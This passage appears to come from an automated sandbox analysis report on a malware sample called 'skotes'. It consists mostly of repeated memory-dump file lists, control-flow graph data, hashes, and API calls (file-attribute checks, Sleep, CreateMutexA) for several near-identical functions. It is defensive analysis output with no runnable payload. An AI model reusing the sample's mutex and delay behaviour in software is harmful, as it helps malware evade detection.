                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                                                                                          • String ID: T2o
                                                                                                                                                                                                                                          • API String ID: 396266464-2760472518
                                                                                                                                                                                                                                          • Opcode ID: 3b5812489a30899c46302fd8cf9a1bfc91973c4eeb460ba3f112848475f7cb72
                                                                                                                                                                                                                                          • Instruction ID: 64a3a3af9f38e2f2d4e79dbcd02b8426cc99e41f2ab3f33fc85f9e4276036912
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3b5812489a30899c46302fd8cf9a1bfc91973c4eeb460ba3f112848475f7cb72
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F0310971B142048BEF08AB7CDDC976EB6ABAB86310F24425CE01497BD6C775498187A1
                                                                                                                                                                                                                                          Function 00699CDA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 139sleepsynchronizationCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 2358 699cda-699cfa GetFileAttributesA 2361 699d28-699d44 2358->2361 2362 699cfc-699d08 2358->2362 2365 699d72-699d91 2361->2365 2366 699d46-699d52 2361->2366 2363 699d0a-699d18 2362->2363 2364 699d1e-699d25 call 6ad663 2362->2364 2363->2364 2369 69a921 2363->2369 2364->2361 2367 699dbf-69a916 call 6a80c0 2365->2367 2368 699d93-699d9f 2365->2368 2371 699d68-699d6f call 6ad663 2366->2371 2372 699d54-699d62 2366->2372 2373 699da1-699daf 2368->2373 2374 699db5-699dbc call 6ad663 2368->2374 2376 69a953-69a987 Sleep CreateMutexA 2369->2376 2377 69a921 call 6c6c6a 2369->2377 2371->2365 2372->2369 2372->2371 2373->2369 2373->2374 2374->2367 2386 69a98e-69a994 2376->2386 2377->2376 2388 69a9a7-69a9a8 2386->2388 2389 69a996-69a998 2386->2389 2389->2388 2390 69a99a-69a9a5 2389->2390 2390->2388 2392 69a9a9-69a9b0 call 6c6629 2390->2392
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(00000000), ref: 00699CDD
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064,?), ref: 0069A963
                                                                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,006F3254), ref: 0069A981
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                                                                                          • String ID: T2o
                                                                                                                                                                                                                                          • API String ID: 396266464-2760472518
                                                                                                                                                                                                                                          • Opcode ID: b9f3cd4741c20521caa3429cd21aaeea9d70dbea207573f9a5b9e5493db3e00c
                                                                                                                                                                                                                                          • Instruction ID: 07187f3faee6933053f74abd6d9513a9914ee39de5583964bfaa55c89d9e257e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b9f3cd4741c20521caa3429cd21aaeea9d70dbea207573f9a5b9e5493db3e00c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 53313731B142408BEF18DBBCCCC87ADB6ABEF86310F24461CE014A7BD5C7358A848761
                                                                                                                                                                                                                                          Function 00699F44 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 137sleepsynchronizationCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(00000000), ref: 00699F47
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064,?), ref: 0069A963
                                                                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,006F3254), ref: 0069A981
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                                                                                          • String ID: T2o
                                                                                                                                                                                                                                          • API String ID: 396266464-2760472518
                                                                                                                                                                                                                                          • Opcode ID: d4db729ed3c565c8d6375c141202408c29990577edf85bbb390e611caecb2104
                                                                                                                                                                                                                                          • Instruction ID: 3283ae752539d50487d84df17eb5195be253cea203a865be5082c045514ac502
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d4db729ed3c565c8d6375c141202408c29990577edf85bbb390e611caecb2104
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 74312A31B102048BEF189BBCDC8C7ADB7A7EB85310F20461DE415D7BD5C735598187A2
                                                                                                                                                                                                                                          Function 0069A079 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 136sleepsynchronizationCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(00000000), ref: 0069A07C
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064,?), ref: 0069A963
                                                                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,006F3254), ref: 0069A981
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                                                                                          • String ID: T2o
                                                                                                                                                                                                                                          • API String ID: 396266464-2760472518
                                                                                                                                                                                                                                          • Opcode ID: 2383c3174392d48a56eec9a8557e61e0a47b57f86f0dcd1fec4ca75620d9e70b
                                                                                                                                                                                                                                          • Instruction ID: c8307756874489a539c19593c10f295fc9b1d45586142edc71b4ef15c0825e7a
